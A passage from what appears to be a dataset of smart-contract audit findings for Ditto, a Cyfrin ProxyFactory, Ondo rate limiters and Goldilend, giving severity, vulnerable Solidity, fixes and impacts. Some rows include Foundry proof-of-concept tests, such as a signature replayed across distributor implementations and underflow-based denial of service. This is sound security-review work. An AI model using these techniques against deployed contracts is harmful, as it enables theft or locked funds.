function.\\ncontracts/libraries/LibVault.sol#L92\\n```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n\\nAfter determining the new `yield` (ETH), a fraction of the `yield` is assigned to the TAPP (treasury). Thereafter, the remaining `yield` is realized by adding it to the vault's `yield` rate (zethYieldRate), which is calculated by dividing the `yield` by the vault's short collateral, `zethCollateral`.\\n[!NOTE] Both the `yield` and `zethCollateral` values are in 18 decimal precision due to tracking ETH balances.\\nBy using the `divU80` function, the `zethYieldRate` is calculated as $zethYieldRate = \\frac{yield \\cdot 10^{18}}{zethCollateral}$\\nHowever, if the numerator is smaller than the denominator, i.e., the received ETH yield is very small and the vault's collateral large enough, the result of the division will be rounded down to 0, leading to a loss of the remaining yield.\\nAs anyone is able to call the public `YieldFacet.updateYield` function, this can be used to maliciously cause a loss of yield for all users if the newly received yield is small.\\nThe following test case demonstrates the described rounding error:\\n","Consider storing the rounding error and applying the correcting factor (error stored) the next time, or alternatively, prevent (skip) updating the yield if the resulting yield is 0.",Loss of LSD ETH yield for users of the same vault.,"```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n" +Use of hardcoded price deviation in baseOracleCircuitBreaker(),low,"The `LibOracle::baseOracleCircuitBreaker()` uses the hardcoded value of 50% price deviation, which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe `baseOracleCircuitBreaker()` is used for verifying the price reported by Chainlink. If the reported price is invalid or its price deviation when compared to the protocol's cached oracle price is more than 50%, the function will fall back to get Uniswap's TWAP price instead.\\nHowever, the `baseOracleCircuitBreaker()` uses a hardcoded value of 50% price deviation (0.5 ether), which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\n```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L77-L78\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L81",The % price deviation should be a variable updatable by the protocol's DAO or admin in production.,"This report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe use of the hardcoded value of 50% price deviation (0.5 ether) might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nConsequently, the check for price deviation in the `baseOracleCircuitBreaker()` might not be effective enough for filtering out the stale price in production, directly affecting the quality of the oracle price that will be consumed by the core functions of the `Ditto` protocol (HIGH impact).","```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n" +Emitting incorrect event value,low,"The `LibShortRecord::burnNFT()` emits an incorrect event value.\\nThe `burnNFT()` emits an incorrect event value: `nft.owner`. Specifically, the `nft` variable will point to the storage object specified by the `tokenId`. However, the pointing storage object will be deleted before emitting the `Transfer` event.\\nSubsequently, the `ERC721::Transfer` event will be emitted with `nft.owner` == `address(0)`.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L366\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L371\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L374","Emit the `Transfer` event before the `delete` operations.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n// Add the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n// Remove the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n",The `ERC721::Transfer` is an important event. The incorrect event logs may cause off-chain services to malfunction.,"```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n" +"The same signature can be used in different `distribution` implementation causing that the caller who owns the signature, can distribute on unauthorized implementations",high,"The same signature can be used in different `distribute` implementations causing that the caller who owns the signature, to `distribute` on unauthorized implementations.\\nThe ProxyFactory::setContest() function helps to configure a `closeTime` to specific `organizer`, `contestId` and `implementation`.\\n```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n\\nThe caller who owns the signature, can distributes to winners using the deployProxyAndDistributeBySignature() function. The problem is that the hash in the code line (#159) does not consider the `implementation` parameter.\\n```\\nFile: ProxyFactory.sol\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n if (ECDSA.recover(digest, signature) != organizer) revert ProxyFactory__InvalidSignature();\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] == 0) revert ProxyFactory__ContestIsNotRegistered();\\n if (saltToCloseTime[salt] > block.timestamp) revert ProxyFactory__ContestIsNotClosed();\\n address proxy = _deployProxy(organizer, contestId, implementation);\\n _distribute(proxy, data);\\n return proxy;\\n }\\n```\\n\\nFor some reason, there could be a different `distribution` implementation to the same `contestId`. Then the caller who owns the signature can distribute even if the organizer does not authorize a signature to the new implementation.\\nI created a test where the caller who owns a signature can distribute to new `distribute implementation` using the same signature. Test steps:\\nOwner setContest using the implementation `address(distributor)`\\nOrganizer creates a signature.\\nCaller distributes prizes using the signature.\\nFor some reason there is a new distributor implementation. The Owner set the new distributor for the same `contestId`.\\nThe caller can distribute prizes using the same signature created in the step 2 in different distributor implementation.\\n```\\n// test/integration/ProxyFactoryTest.t.sol:ProxyFactoryTest\\n// $ forge test --match-test ""testSignatureCanBeUsedToNewImplementation"" -vvv\\n//\\n function testSignatureCanBeUsedToNewImplementation() public {\\n address organizer = TEST_SIGNER;\\n bytes32 contestId = keccak256(abi.encode(""Jason"", ""001""));\\n //\\n // 1. Owner setContest using address(distributor)\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(distributor));\\n vm.stopPrank();\\n bytes32 salt = keccak256(abi.encode(organizer, contestId, address(distributor)));\\n address proxyAddress = proxyFactory.getProxyAddress(salt, address(distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyAddress, 10000 ether);\\n vm.stopPrank();\\n assertEq(MockERC20(jpycv2Address).balanceOf(proxyAddress), 10000 ether);\\n // before\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 0 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 0 ether);\\n //\\n // 2. Organizer creates a signature\\n (bytes32 digest, bytes memory sendingData, bytes memory signature) = createSignatureByASigner(TEST_SIGNER_KEY);\\n assertEq(ECDSA.recover(digest, signature), TEST_SIGNER);\\n vm.warp(8.01 days);\\n //\\n // 3. Caller distributes prizes using the signature\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(distributor), signature, sendingData\\n );\\n // after\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 9500 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 500 ether);\\n //\\n // 4. For some reason there is a new distributor implementation.\\n // The Owner set the new distributor for the same contestId\\n Distributor new_distributor = new Distributor(address(proxyFactory), stadiumAddress);\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(new_distributor));\\n vm.stopPrank();\\n bytes32 newDistributorSalt = keccak256(abi.encode(organizer, contestId, address(new_distributor)));\\n address proxyNewDistributorAddress = proxyFactory.getProxyAddress(newDistributorSalt, address(new_distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyNewDistributorAddress, 10000 ether);\\n vm.stopPrank();\\n //\\n // 5. The caller can distribute prizes using the same signature in different distributor implementation\\n vm.warp(20 days);\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(new_distributor), signature, sendingData\\n );\\n }\\n```\\n","Include the `distribution implementation` in the signature hash.\\n```\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n// Remove the line below\\n// Remove the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n// Add the line below\\n// Add the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, implementation, data)));\\n```\\n","The caller who owns the signature, can distribute the prizes for a new distribution implementation using the same signature which was created for an old implementation. The `organizer` must create a new signature if there is a new implementation for the same `contestId`. The authorized signature is for one distribution implementation not for the future distribution implementations.\\nTools used\\nManual review","```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n" +Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever,medium,"The vulnerability relates to the immutability of `STADIUM_ADDRESS`. If this address is blacklisted by the token used for rewards, the system becomes unable to make transfers, leading to funds being stuck in the contract indefinitely.\\nOwner calls `setContest` with the correct `salt`.\\nThe Organizer sends USDC as rewards to a pre-determined Proxy address.\\n`STADIUM_ADDRESS` is blacklisted by the USDC operator.\\nWhen the contest is closed, the Organizer calls `deployProxyAndDistribute` with the registered `contestId` and `implementation` to deploy a proxy and distribute rewards. However, the call to `Distributor._commissionTransfer` reverts at Line 164 due to the blacklisting.\\nUSDC held at the Proxy contract becomes stuck forever.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n","It is recommended to allow `STADIUM_ADDRESS` to be updatable by a dedicated admin role to avoid token transfer blacklisting. Moreover, since `STADIUM_ADDRESS` is no longer `immutable`, `storage` collision should be taken into account.","This vulnerability is marked as High severity because a blacklisted `STADIUM_ADDRESS` would lead to funds being locked in the Proxy address permanently. Funds are already held in the Proxy, and the Proxy's `_implementation` cannot be changed once deployed. Even the `ProxyFactory.distributeByOwner()` function cannot rescue the funds due to the revert.","```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n" +`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow,low,"`InvestorBasedRateLimiter::_checkAndUpdateRateLimitState` L211-213 subtracts the current mint/redemption amount from the corresponding limit:\\n```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n\\nIf `setInvestorMintLimit` or `setInvestorRedemptionLimit` are used to set the limit amount for minting or redemptions smaller than the current mint/redemption amount, calls to this function will revert due to underflow.",Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nif (rateLimit.limit <= rateLimit.currentAmount || amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n,"`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow.\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_setInvestorMintLimit_underflow_DoS() public initDefault(alice) {\\n // first perform a mint\\n uint256 mintAmount = rateLimiter.defaultMintLimit();\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, mintAmount);\\n\\n // admin now reduces the mint limit to be under the current\\n // minted amount\\n uint256 aliceInvestorId = 1;\\n uint256 newMintLimit = mintAmount - 1;\\n vm.prank(guardian);\\n rateLimiter.setInvestorMintLimit(aliceInvestorId, newMintLimit);\\n\\n // subsequent calls to `checkAndUpdateMintLimit` revert due to underflow\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, 1);\\n\\n // same issue affects `setInvestorRedemptionLimit`\\n}\\n```\\n\\nRun with: `forge test --match-test test_setInvestorMintLimit_underflow_DoS`\\nProduces output:\\n```\\nRan 1 test for forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:Test_InvestorBasedRateLimiter_setters_ETH\\n[FAIL. Reason: panic: arithmetic underflow or overflow (0x11)] test_setInvestorMintLimit_underflow_DoS() (gas: 264384)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.09ms (116.74µs CPU time)\\n```\\n",```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n +Prevent creating an investor record associated with no address,low,"`InvestorBasedRateLimiter::initializeInvestorStateDefault` is supposed to associate a newly created investor with one or more addresses but the `for` loop which does this can be bypassed by calling the function with an empty array:\\n```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n",In `_initializeInvestorState` revert if the input address array is empty:\\n```\\nuint256 addressesLength = addresses.length;\\n\\nif(addressesLength == 0) revert EmptyAddressArray();\\n```\\n,"An investor record can be created without any associated address. This breaks the following invariant of the `InvestorBasedRateLimiter` contract:\\nwhen a new `investorId` is created, it should be associated with one or more valid addresses\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_initializeInvestor_NoAddress() public {\\n // no investor created\\n assertEq(0, rateLimiter.investorIdCounter());\\n\\n // empty input array will bypass the `for` loop that is supposed\\n // to associate addresses to the newly created investor\\n address[] memory addresses;\\n\\n vm.prank(guardian);\\n rateLimiter.initializeInvestorStateDefault(addresses);\\n\\n // one investor created\\n assertEq(1, rateLimiter.investorIdCounter());\\n\\n // not associated with any addresses\\n assertEq(0, rateLimiter.investorAddressCount(1));\\n}\\n```\\n\\nRun with: `forge test --match-test test_initializeInvestor_NoAddress`","```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n" +`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow,low,"`InstantMintTimeBasedRateLimiter::_checkAndUpdateInstantMintLimit` L103-106 subtracts the currently minted amount from the mint limit:\\n```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n ""RateLimit: Mint exceeds rate limit""\\n);\\n```\\n\\nIf `_setInstantMintLimit` is used to set `instantMintLimit < currentInstantMintAmount`, subsequent calls to this function will revert due the underflow. The same is true for `_setInstantRedemptionLimit` and `_checkAndUpdateInstantRedemptionLimit`.","Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nfunction _checkAndUpdateInstantMintLimit(uint256 amount) internal {\\n require(\\n instantMintLimit > currentInstantMintAmount && amount <= instantMintLimit - currentInstantMintAmount,\\n ""RateLimit: Mint exceeds rate limit""\\n );\\n}\\n\\nfunction _checkAndUpdateInstantRedemptionLimit(uint256 amount) internal {\\n require(\\n instantRedemptionLimit > currentInstantRedemptionAmount && amount <= instantRedemptionLimit - currentInstantRedemptionAmount,\\n ""RateLimit: Redemption exceeds rate limit""\\n );\\n}\\n```\\n",`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow.,"```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n ""RateLimit: Mint exceeds rate limit""\\n);\\n```\\n" +Protocol may be short-changed by `BuidlRedeemer` during a USDC depeg event,low,"`OUSGInstantManager::_redeemBUIDL` assumes that 1 BUIDL = 1 USDC as it enforces receiving 1 USDC for every 1 BUIDL it redeems:\\n```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n ""OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1""\\n);\\n```\\n\\nIn the event of a USDC depeg (especially if the depeg is sustained), `BUIDLRedeemer` should return greater than a 1:1 ratio since 1 USDC would not be worth $1, hence 1 BUIDL != 1 USDC meaning the value of the protocol's BUIDL is worth more USDC. However `BUIDLReceiver` does not do this, it only ever returns 1:1.","To prevent this situation the protocol would need to use an oracle to check whether USDC had depegged and if so, calculate the amount of USDC it should receive in exchange for its BUIDL. If it is short-changed it would either have to revert preventing redemptions or allow the redemption while saving the short-changed amount to storage then implement an off-chain process with BlackRock to receive the short-changed amount.\\nAlternatively the protocol may simply accept this as a risk to the protocol that it will be willingly short-changed during a USDC depeg in order to allow redemptions to continue.","In the event of a USDC depeg the protocol will be short-changed by `BuidlRedeemer` since it will happily receive only 1 USDC for every 1 BUIDL redeemed, even though the value of 1 BUIDL would be greater than the value of 1 USDC due to the USDC depeg.","```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n ""OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1""\\n);\\n```\\n" +Consider allowing `ROUSG::burn` to burn dust amounts,low,"`ROUSG::burn` is used by admins to burn `rOUSG` tokens from any account for regulatory reasons.\\nIt does not allow burning a share amount smaller than 1e4, because this is less than a wei of `OUSG`.\\n```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n\\nDepending on the current and future regulatory situation it could be necessary to always be able to burn all shares from users.",Consider allowing the `burn` function to `burn` all remaining shares even if under the minimum amount.,,```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n +`Goldilend.lock()` will always revert,high,"In `lock()`, it calls `_refreshiBGT()` before pulling `iBGT` from the user and will revert while calling `iBGTVault(ibgtVault).stake()`.\\n```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n",`_refreshiBGT()` should be called after pulling funds from the user.,Users can't lock `iBGT` as `lock()` always reverts.,"```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n" +Wrong `PoolSize` increment in `Goldilend.repay()`,high,"When a user repays his loan using `repay()`, it increases `poolSize` with the repaid interest. During the increment, it uses the wrong amount.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - 